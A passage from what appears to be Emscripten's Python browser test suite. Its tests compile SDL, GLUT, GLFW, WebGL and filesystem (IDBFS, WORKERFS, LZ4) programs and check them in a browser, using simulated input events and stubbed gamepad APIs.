self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest('webgl_parallel_shader_compile.cpp', '1')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest('webgl_explicit_uniform_location.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest('webgl_sampler_layout_binding.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1'])
@unittest.skip('needs to be fixed, see https://github.com/emscripten-core/emscripten/pull/13887#issuecomment-825804449')
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest('webgl2_ubo_layout_binding.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
